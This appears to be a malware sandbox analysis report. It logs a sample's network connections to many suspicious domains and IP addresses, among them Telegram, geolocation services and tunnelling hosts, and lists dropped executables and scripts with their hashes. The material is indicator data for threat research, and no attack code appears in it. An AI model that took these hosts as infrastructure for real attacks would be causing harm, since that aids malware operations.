US 8.8.8.8:53 225.74.250.142.in-addr.arpa udp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 r11.o.lencr.org udp
GB 88.221.135.105:80 r11.o.lencr.org tcp
US 8.8.8.8:53 96.33.115.104.in-addr.arpa udp
US 8.8.8.8:53 81.59.117.34.in-addr.arpa udp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
RU 31.41.244.9:80 31.41.244.9 tcp
US 8.8.8.8:53 105.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 22.249.124.192.in-addr.arpa udp
US 8.8.8.8:53 9.244.41.31.in-addr.arpa udp
RU 185.215.113.16:80 185.215.113.16 tcp
US 8.8.8.8:53 16.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 99.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 grahm.xyz udp
DE 116.203.10.31:443 grahm.xyz tcp
US 8.8.8.8:53 31.10.203.116.in-addr.arpa udp
DE 116.203.10.31:443 grahm.xyz tcp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
DE 116.203.10.31:443 grahm.xyz tcp
US 66.45.226.53:7777 66.45.226.53 tcp
RU 89.169.40.170:143 tcp
RU 89.169.41.157:8080 tcp
RU 213.108.19.30:445 tcp
RU 89.169.1.23:80 tcp
RU 89.169.20.205:49158 tcp
RU 89.169.1.26:8081 tcp
RU 89.169.0.127:8291 tcp
US 8.8.8.8:53 e5.o.lencr.org udp
GB 88.221.134.137:80 e5.o.lencr.org tcp
DE 116.203.10.31:443 grahm.xyz tcp
US 8.8.8.8:53 53.226.45.66.in-addr.arpa udp
US 8.8.8.8:53 30.19.108.213.in-addr.arpa udp
US 8.8.8.8:53 137.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
DE 116.203.10.31:443 grahm.xyz tcp
DE 116.203.10.31:443 grahm.xyz tcp
DE 116.203.10.31:443 grahm.xyz tcp
DE 116.203.10.31:443 grahm.xyz tcp
US 8.8.8.8:53 82.190.18.2.in-addr.arpa udp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 infect-crackle.cyou udp
US 104.21.45.165:443 infect-crackle.cyou tcp
US 8.8.8.8:53 se-blurry.biz udp
US 8.8.8.8:53 zinc-sneark.biz udp
US 8.8.8.8:53 dwell-exclaim.biz udp
US 8.8.8.8:53 formy-spill.biz udp
US 8.8.8.8:53 covery-mover.biz udp
US 172.67.206.64:443 covery-mover.biz tcp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 165.45.21.104.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 8.8.8.8:53 fightlsoser.click udp
US 208.95.112.1:80 ip-api.com tcp
US 172.67.213.48:443 fightlsoser.click tcp
FR 142.250.75.238:443 drive.google.com tcp
US 8.8.8.8:53 dare-curbys.biz udp
US 8.8.8.8:53 print-vexer.biz udp
US 8.8.8.8:53 impend-differ.biz udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.123.95.227:443 steamcommunity.com tcp
FR 142.250.74.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 peerhost59mj7i6macla65r.com udp
US 8.8.8.8:53 ikswccmqsqeswegi.xyz udp
NL 94.154.172.218:443 peerhost59mj7i6macla65r.com tcp
US 8.8.8.8:53 aukuqiksseyscgie.xyz udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 172.67.206.64:443 covery-mover.biz tcp
N/A 224.0.0.251:5353 udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
GB 104.123.95.227:443 steamcommunity.com tcp
US 8.8.8.8:53 64.206.67.172.in-addr.arpa udp
US 8.8.8.8:53 48.213.67.172.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 227.95.123.104.in-addr.arpa udp
US 8.8.8.8:53 218.172.154.94.in-addr.arpa udp
US 8.8.8.8:53 124.191.200.185.in-addr.arpa udp
NL 94.154.172.218:443 peerhost59mj7i6macla65r.com tcp
NL 94.154.172.218:443 peerhost59mj7i6macla65r.com tcp
US 154.216.18.132:6868 tcp
NL 94.154.172.218:443 peerhost59mj7i6macla65r.com tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
NL 149.154.167.220:443 api.telegram.org tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 154.216.18.132:6868 tcp
NL 149.154.167.99:443 t.me tcp
DE 116.203.10.31:443 grahm.xyz tcp
DE 116.203.10.31:443 grahm.xyz tcp
US 154.216.18.132:6868 tcp
DE 116.203.10.31:443 grahm.xyz tcp
DE 116.203.10.31:443 grahm.xyz tcp
US 8.8.8.8:53 drive-connect.cyou udp
US 104.21.79.7:443 drive-connect.cyou tcp
US 8.8.8.8:53 se-blurry.biz udp
US 8.8.8.8:53 zinc-sneark.biz udp
US 8.8.8.8:53 dwell-exclaim.biz udp
US 8.8.8.8:53 7.79.21.104.in-addr.arpa udp
US 8.8.8.8:53 22.49.80.91.in-addr.arpa udp
US 8.8.8.8:53 formy-spill.biz udp
DE 116.203.10.31:443 grahm.xyz tcp
US 172.67.206.64:443 covery-mover.biz tcp
US 8.8.8.8:53 dare-curbys.biz udp
US 8.8.8.8:53 print-vexer.biz udp
US 8.8.8.8:53 impend-differ.biz udp
US 8.8.8.8:53 steamcommunity.com udp
FR 23.217.238.254:443 steamcommunity.com tcp
DE 116.203.10.31:443 grahm.xyz tcp
US 154.216.18.132:6868 tcp
DE 116.203.10.31:443 grahm.xyz tcp
US 8.8.8.8:53 254.238.217.23.in-addr.arpa udp
DE 116.203.10.31:443 grahm.xyz tcp
US 8.8.8.8:53 a1060630.xsph.ru udp
RU 141.8.192.138:80 a1060630.xsph.ru tcp
US 154.216.18.132:6868 tcp
US 8.8.8.8:53 138.192.8.141.in-addr.arpa udp
FR 142.250.75.238:443 drive.google.com tcp
DE 101.99.92.189:8080 tcp
FR 142.250.74.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 189.92.99.101.in-addr.arpa udp
US 154.216.18.132:6868 tcp
US 8.8.8.8:53 ikswccmqsqeswegi.xyz udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 34.117.59.81:443 ipinfo.io tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 f0706909.xsph.ru udp
US 8.8.8.8:53 ipwho.is udp
RU 141.8.193.236:80 f0706909.xsph.ru tcp
US 154.216.18.132:6868 tcp
DE 195.201.57.90:80 ipwho.is tcp
US 8.8.8.8:53 90.57.201.195.in-addr.arpa udp
US 8.8.8.8:53 236.193.8.141.in-addr.arpa udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 154.216.18.132:6868 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 154.216.18.132:6868 tcp
GB 193.63.58.76:9001 tcp
N/A 127.0.0.1:53792 tcp
N/A 127.0.0.1:53910 tcp
US 154.216.18.132:6868 tcp
US 8.8.8.8:53 76.58.63.193.in-addr.arpa udp
DE 89.58.54.129:443 tcp
FR 94.23.172.32:443 tcp
US 8.8.8.8:53 32.172.23.94.in-addr.arpa udp
US 8.8.8.8:53 129.54.58.89.in-addr.arpa udp
US 8.8.8.8:53 sanboxland.pro udp
GB 89.35.131.209:80 sanboxland.pro tcp
US 8.8.8.8:53 209.131.35.89.in-addr.arpa udp
US 154.216.18.132:6868 tcp
US 154.216.18.132:6868 tcp
US 8.8.8.8:53 a1059592.xsph.ru udp
RU 141.8.192.138:80 a1059592.xsph.ru tcp
US 154.216.18.132:6868 tcp
US 8.8.8.8:53 f1043947.xsph.ru udp
RU 141.8.192.151:80 f1043947.xsph.ru tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 154.216.18.132:6868 tcp
US 8.8.8.8:53 151.192.8.141.in-addr.arpa udp
US 8.8.8.8:53 a1051707.xsph.ru udp
RU 141.8.192.217:80 a1051707.xsph.ru tcp
US 8.8.8.8:53 217.192.8.141.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:80 github.com tcp
US 8.8.8.8:53 freegeoip.app udp
US 172.67.160.84:443 freegeoip.app tcp
US 8.8.8.8:53 gstatic.com udp
FR 142.250.75.227:443 gstatic.com tcp
US 8.8.8.8:53 84.160.67.172.in-addr.arpa udp
GB 20.26.156.215:443 github.com tcp
US 154.216.18.132:6868 tcp
US 8.8.8.8:53 227.75.250.142.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 ipbase.com udp
US 104.21.85.189:443 ipbase.com tcp
US 8.8.8.8:53 189.85.21.104.in-addr.arpa udp
US 154.216.17.90:80 tcp
US 154.216.18.132:6868 tcp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
RU 176.113.115.19:80 176.113.115.19 tcp
US 8.8.8.8:53 19.115.113.176.in-addr.arpa udp
US 8.8.8.8:53 www.speak-a-message.com udp
DE 195.201.119.163:80 www.speak-a-message.com tcp
US 8.8.8.8:53 awake-weaves.cyou udp
US 154.216.18.132:6868 tcp
US 104.21.27.188:443 awake-weaves.cyou tcp
US 8.8.8.8:53 163.119.201.195.in-addr.arpa udp
US 8.8.8.8:53 188.27.21.104.in-addr.arpa udp
US 8.8.8.8:53 ipwho.is udp
DE 195.201.57.90:80 ipwho.is tcp
US 8.8.8.8:53 immureprech.biz udp
US 172.67.207.38:443 immureprech.biz tcp
US 8.8.8.8:53 deafeninggeh.biz udp
US 8.8.8.8:53 jrqh-hk.com udp
US 104.21.16.1:443 deafeninggeh.biz tcp
CN 123.136.92.99:80 jrqh-hk.com tcp
US 8.8.8.8:53 38.207.67.172.in-addr.arpa udp
US 8.8.8.8:53 1.16.21.104.in-addr.arpa udp
US 8.8.8.8:53 effecterectz.xyz udp
US 8.8.8.8:53 diffuculttan.xyz udp
US 8.8.8.8:53 debonairnukk.xyz udp
US 8.8.8.8:53 wrathful-jammy.cyou udp
US 104.21.74.196:443 wrathful-jammy.cyou tcp
US 8.8.8.8:53 99.92.136.123.in-addr.arpa udp
US 8.8.8.8:53 196.74.21.104.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 8.8.8.8:53 sordid-snaked.cyou udp
US 208.95.112.1:80 ip-api.com tcp
US 172.67.141.195:443 sordid-snaked.cyou tcp
US 8.8.8.8:53 steamcommunity.com udp
GB 23.214.143.155:443 steamcommunity.com tcp
US 8.8.8.8:53 195.141.67.172.in-addr.arpa udp
US 8.8.8.8:53 155.143.214.23.in-addr.arpa udp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 154.216.18.132:6868 tcp
US 8.8.8.8:53 login-donor.gl.at.ply.gg udp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
US 8.8.8.8:53 discord.com udp
US 162.159.135.232:443 discord.com tcp
US 8.8.8.8:53 232.135.159.162.in-addr.arpa udp
US 20.83.148.22:8080 20.83.148.22 tcp
US 154.216.18.132:6868 tcp
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 24.19.67.172.in-addr.arpa udp
US 8.8.8.8:53 22.148.83.20.in-addr.arpa udp
US 8.8.8.8:53 id71.internetid.ru udp
RU 95.213.205.83:5655 id71.internetid.ru tcp
US 8.8.8.8:53 83.205.213.95.in-addr.arpa udp
US 8.8.8.8:53 aukuqiksseyscgie.xyz udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
RU 77.223.124.212:5655 tcp
US 8.8.8.8:53 212.124.223.77.in-addr.arpa udp
US 20.83.148.22:80 tcp
US 154.216.18.132:6868 tcp
US 8.8.8.8:53 ship-amongst.gl.at.ply.gg udp
US 147.185.221.24:14429 ship-amongst.gl.at.ply.gg tcp
US 8.8.8.8:53 24.221.185.147.in-addr.arpa udp
US 154.216.18.132:6868 tcp
US 8.8.8.8:53 testinghigger-42471.portmap.host udp
DE 193.161.193.99:42471 testinghigger-42471.portmap.host tcp
US 8.8.8.8:53 camp.zapto.org udp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 8.8.8.8:53 3.26.192.23.in-addr.arpa udp
US 154.216.18.132:6868 tcp
US 154.216.17.90:80 tcp
DE 193.161.193.99:42471 testinghigger-42471.portmap.host tcp
N/A 192.168.56.1:4782 tcp
US 154.216.18.132:6868 tcp
GB 20.26.156.215:80 github.com tcp
US 154.216.18.132:6868 tcp
DE 193.161.193.99:42471 testinghigger-42471.portmap.host tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 8.8.8.8:53 updates.signiant.com udp
US 154.216.18.132:6868 tcp
DE 13.32.121.30:80 updates.signiant.com tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 8.8.8.8:53 30.121.32.13.in-addr.arpa udp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
US 8.8.8.8:53 www.hootech.com udp
US 107.191.125.184:80 www.hootech.com tcp
US 8.8.8.8:53 portals.mediashuttle.com udp
US 76.223.25.251:443 portals.mediashuttle.com tcp
US 8.8.8.8:53 184.125.191.107.in-addr.arpa udp
US 8.8.8.8:53 251.25.223.76.in-addr.arpa udp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
RU 31.41.244.10:80 31.41.244.10 tcp
US 20.83.148.22:80 tcp
US 154.216.18.132:6868 tcp
US 154.216.18.132:6868 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
N/A 192.168.56.1:4782 tcp
US 154.216.18.132:6868 tcp
US 154.216.17.90:80 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 154.216.18.132:6868 tcp
US 147.185.221.24:14429 ship-amongst.gl.at.ply.gg tcp
US 154.216.18.132:6868 tcp
US 8.8.8.8:53 webcdn.triongames.com udp
GB 2.19.117.96:80 webcdn.triongames.com tcp
RU 185.81.68.147:80 185.81.68.147 tcp
DE 87.120.84.32:80 87.120.84.32 tcp
US 8.8.8.8:53 96.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 147.68.81.185.in-addr.arpa udp
CA 158.69.12.143:7771 camp.zapto.org tcp
RU 185.81.68.147:1912 tcp
US 8.8.8.8:53 32.84.120.87.in-addr.arpa udp
BG 195.230.23.72:8085 195.230.23.72 tcp
US 8.8.8.8:53 get.geojs.io udp
US 172.67.70.233:443 get.geojs.io tcp
US 154.216.18.132:6868 tcp
US 8.8.8.8:53 72.23.230.195.in-addr.arpa udp
US 8.8.8.8:53 233.70.67.172.in-addr.arpa udp
RU 185.215.113.43:80 185.215.113.43 tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 43.113.215.185.in-addr.arpa udp
RU 31.41.244.11:80 31.41.244.11 tcp
US 154.216.18.132:6868 tcp
US 154.216.18.132:6868 tcp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
DE 94.156.177.133:7000 tcp
RU 185.215.113.16:80 185.215.113.16 tcp
US 154.216.18.132:6868 tcp
US 8.8.8.8:53 133.177.156.94.in-addr.arpa udp
NL 80.82.65.70:80 80.82.65.70 tcp
US 8.8.8.8:53 70.65.82.80.in-addr.arpa udp
CA 158.69.12.143:7771 camp.zapto.org tcp
N/A 192.168.56.1:4782 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 154.216.18.132:6868 tcp
US 20.83.148.22:80 tcp
US 154.216.18.132:6868 tcp
US 8.8.8.8:53 boot-01.net.anydesk.com udp
DE 195.181.174.173:443 boot-01.net.anydesk.com tcp
US 8.8.8.8:53 relay-ad195ac5.net.anydesk.com udp
GB 57.128.141.163:80 relay-ad195ac5.net.anydesk.com tcp
US 8.8.8.8:53 173.174.181.195.in-addr.arpa udp
US 8.8.8.8:53 163.141.128.57.in-addr.arpa udp
US 8.8.8.8:53 api.playanext.com udp
DE 18.245.86.26:80 api.playanext.com tcp
US 154.216.18.132:6868 tcp
US 8.8.8.8:53 camp.zapto.org udp
CA 158.69.12.143:7771 camp.zapto.org tcp
RU 185.81.68.147:1912 tcp
US 154.216.18.132:6868 tcp
BG 195.230.23.72:80 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 154.216.18.132:6868 tcp
US 154.216.17.90:80 tcp
US 154.216.18.132:6868 tcp
US 8.8.8.8:53 boot.net.anydesk.com udp
FR 57.128.64.30:443 boot.net.anydesk.com tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 8.8.8.8:53 relay-0135ac48.net.anydesk.com udp
GB 57.128.141.165:443 relay-0135ac48.net.anydesk.com tcp
US 8.8.8.8:53 30.64.128.57.in-addr.arpa udp
US 8.8.8.8:53 165.141.128.57.in-addr.arpa udp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
US 154.216.18.132:6868 tcp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
US 8.8.8.8:53 18.102.255.239.in-addr.arpa udp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
N/A 192.168.56.1:4782 tcp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
US 154.216.18.132:6868 tcp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
US 154.216.18.132:6868 tcp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
US 154.216.18.132:6868 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 154.216.18.132:6868 tcp
US 20.83.148.22:80 tcp
TH 165.154.184.75:80 165.154.184.75 tcp
US 8.8.8.8:53 75.184.154.165.in-addr.arpa udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 154.216.18.132:6868 tcp
US 154.216.18.132:6868 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 8.8.8.8:53 www.grupodulcemar.pe udp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
PE 161.132.57.101:443 www.grupodulcemar.pe tcp
US 8.8.8.8:53 gstatic.com udp
FR 142.250.75.227:443 gstatic.com tcp
US 8.8.8.8:53 101.57.132.161.in-addr.arpa udp
US 154.216.18.132:6868 tcp
US 8.8.8.8:53 grahm.xyz udp
DE 116.203.10.31:443 grahm.xyz tcp
N/A 192.168.56.1:4782 tcp
DE 116.203.10.31:443 grahm.xyz tcp
US 154.216.18.132:6868 tcp
DE 116.203.10.31:443 grahm.xyz tcp
HK 47.244.167.171:801 tcp
US 8.8.8.8:53 drive-connect.cyou udp
US 104.21.79.7:443 drive-connect.cyou tcp
DE 116.203.10.31:443 grahm.xyz tcp
US 8.8.8.8:53 171.167.244.47.in-addr.arpa udp
US 8.8.8.8:53 se-blurry.biz udp
US 154.216.18.132:6868 tcp
US 8.8.8.8:53 zinc-sneark.biz udp
DE 116.203.10.31:443 grahm.xyz tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 8.8.8.8:53 dwell-exclaim.biz udp
DE 116.203.10.31:443 grahm.xyz tcp
US 8.8.8.8:53 formy-spill.biz udp
US 8.8.8.8:53 covery-mover.biz udp
US 172.67.206.64:443 covery-mover.biz tcp
BG 195.230.23.72:80 tcp
US 154.216.18.132:6868 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
BG 195.230.23.72:80 tcp
DE 116.203.10.31:443 grahm.xyz tcp
US 8.8.8.8:53 print-vexer.biz udp
US 8.8.8.8:53 impend-differ.biz udp
DE 116.203.10.31:443 grahm.xyz tcp
US 8.8.8.8:53 steamcommunity.com udp
FR 23.217.238.254:443 steamcommunity.com tcp
BG 195.230.23.72:80 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
BG 195.230.23.72:80 tcp
BG 195.230.23.72:80 tcp
BG 195.230.23.72:80 tcp
US 20.83.148.22:80 tcp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
N/A 192.168.56.1:4782 tcp
US 8.8.8.8:53 youtube.com udp
FR 172.217.18.206:443 youtube.com tcp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 spocs.getpocket.com udp
US 8.8.8.8:53 firefox-api-proxy.cdn.mozilla.net udp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 34.149.97.1:443 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net tcp
US 34.149.97.1:443 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 206.18.217.172.in-addr.arpa udp
US 8.8.8.8:53 camp.zapto.org udp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 firefox-settings-attachments.cdn.mozilla.net udp
US 8.8.8.8:53 160.181.213.54.in-addr.arpa udp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 147.185.221.24:14429 ship-amongst.gl.at.ply.gg tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
GB 89.35.131.209:80 sanboxland.pro tcp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 ciscobinary.openh264.org udp
GB 88.221.134.209:80 ciscobinary.openh264.org tcp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
US 8.8.8.8:53 redirector.gvt1.com udp
FR 216.58.214.174:443 redirector.gvt1.com tcp
US 8.8.8.8:53 redirector.gvt1.com udp
US 8.8.8.8:53 redirector.gvt1.com udp
US 8.8.8.8:53 location.services.mozilla.com udp
US 8.8.8.8:53 201.181.244.35.in-addr.arpa udp
US 8.8.8.8:53 209.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 174.214.58.216.in-addr.arpa udp
US 35.190.72.216:443 location.services.mozilla.com tcp
US 8.8.8.8:53 prod.classify-client.prod.webservices.mozgcp.net udp
FR 216.58.214.174:443 redirector.gvt1.com udp
US 8.8.8.8:53 r4---sn-aigzrnsz.gvt1.com udp
US 8.8.8.8:53 prod.classify-client.prod.webservices.mozgcp.net udp
GB 74.125.175.169:443 r4---sn-aigzrnsz.gvt1.com tcp
US 8.8.8.8:53 r4.sn-aigzrnsz.gvt1.com udp
US 8.8.8.8:53 r4.sn-aigzrnsz.gvt1.com udp
GB 74.125.175.169:443 r4.sn-aigzrnsz.gvt1.com udp
US 35.190.72.216:443 prod.classify-client.prod.webservices.mozgcp.net udp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 8.8.8.8:53 216.72.190.35.in-addr.arpa udp
US 8.8.8.8:53 169.175.125.74.in-addr.arpa udp
N/A 192.168.56.1:4782 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 34.117.121.53:443 attachments.prod.remote-settings.prod.webservices.mozgcp.net tcp
US 20.83.148.22:80 tcp
US 8.8.8.8:53 camp.zapto.org udp
CA 158.69.12.143:7771 camp.zapto.org tcp
BG 195.230.23.72:80 tcp
BG 195.230.23.72:80 tcp
BG 195.230.23.72:80 tcp
BG 195.230.23.72:80 tcp
BG 195.230.23.72:80 tcp
BG 195.230.23.72:80 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp

Files

memory/4760-0-0x00007FFEF9FB3000-0x00007FFEF9FB5000-memory.dmp

memory/4760-1-0x00000000006F0000-0x00000000006F8000-memory.dmp

memory/4760-2-0x00007FFEF9FB0000-0x00007FFEFAA71000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\random.exe

MD5 3a425626cbd40345f5b8dddd6b2b9efa
SHA1 7b50e108e293e54c15dce816552356f424eea97a
SHA256 ba9212d2d5cd6df5eb7933fb37c1b72a648974c1730bf5c32439987558f8e8b1
SHA512 a7538c6b7e17c35f053721308b8d6dc53a90e79930ff4ed5cffecaa97f4d0fbc5f9e8b59f1383d8f0699c8d4f1331f226af71d40325022d10b885606a72fe668

C:\Users\Admin\AppData\Local\Temp\a\u1w30Wt.exe

MD5 e3eb0a1df437f3f97a64aca5952c8ea0
SHA1 7dd71afcfb14e105e80b0c0d7fce370a28a41f0a
SHA256 38ffd4972ae513a0c79a8be4573403edcd709f0f572105362b08ff50cf6de521
SHA512 43573b0cbaac6e2e1646e6217d2d10c40ad10b9db1f4492d6740545e793c891b5e39283a082896c0392b88eb319dfa9392421b1c89c094c9ce9f31b53d37ebaf

C:\Users\Admin\AppData\Local\Temp\a\client.exe

MD5 52a3c7712a84a0f17e9602828bf2e86d
SHA1 15fca5f393bc320b6c4d22580fe7d2f3a1970ac2
SHA256 afa87c0232de627e818d62578bde4809d8d91a3021bc4b5bdb678767844e2288
SHA512 892e084cfe823d820b00381625edda702a561be82c24a3e2701a1b2a397d4fc49e45ca80ac93a60d46efc83b224a6dc7ea1ea85f74ee8a27220a666b3f7ebfac

memory/4704-34-0x000001C568CA0000-0x000001C568CB8000-memory.dmp

memory/4704-35-0x000001C56B440000-0x000001C56B602000-memory.dmp

memory/4704-36-0x00007FFEF9FB0000-0x00007FFEFAA71000-memory.dmp

memory/4704-37-0x000001C56BD20000-0x000001C56C248000-memory.dmp

memory/4760-38-0x00007FFEF9FB3000-0x00007FFEF9FB5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\main\main.bat

MD5 3626532127e3066df98e34c3d56a1869
SHA1 5fa7102f02615afde4efd4ed091744e842c63f78
SHA256 2a0e18ef585db0802269b8c1ddccb95ce4c0bac747e207ee6131dee989788bca
SHA512 dcce66d6e24d5a4a352874144871cd73c327e04c1b50764399457d8d70a9515f5bc0a650232763bf34d4830bab70ee4539646e7625cfe5336a870e311043b2bd

memory/4760-52-0x00007FFEF9FB0000-0x00007FFEFAA71000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\main\file.bin

MD5 045b0a3d5be6f10ddf19ae6d92dfdd70
SHA1 0387715b6681d7097d372cd0005b664f76c933c7
SHA256 94b392e94fa47d1b9b7ae6a29527727268cc2e3484e818c23608f8835bc1104d
SHA512 58255a755531791b888ffd9b663cc678c63d5caa932260e9546b1b10a8d54208334725c14529116b067bcf5a5e02da85e015a3bed80092b7698a43dab0168c7b

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

MD5 619f7135621b50fd1900ff24aade1524
SHA1 6c7ea8bbd435163ae3945cbef30ef6b9872a4591
SHA256 344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2
SHA512 2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

C:\Users\Admin\AppData\Local\Temp\main\7z.dll

MD5 72491c7b87a7c2dd350b727444f13bb4
SHA1 1e9338d56db7ded386878eab7bb44b8934ab1bc7
SHA256 34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891
SHA512 583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_7.zip

MD5 cea368fc334a9aec1ecff4b15612e5b0
SHA1 493d23f72731bb570d904014ffdacbba2334ce26
SHA256 07e38cad68b0cdbea62f55f9bc6ee80545c2e1a39983baa222e8af788f028541
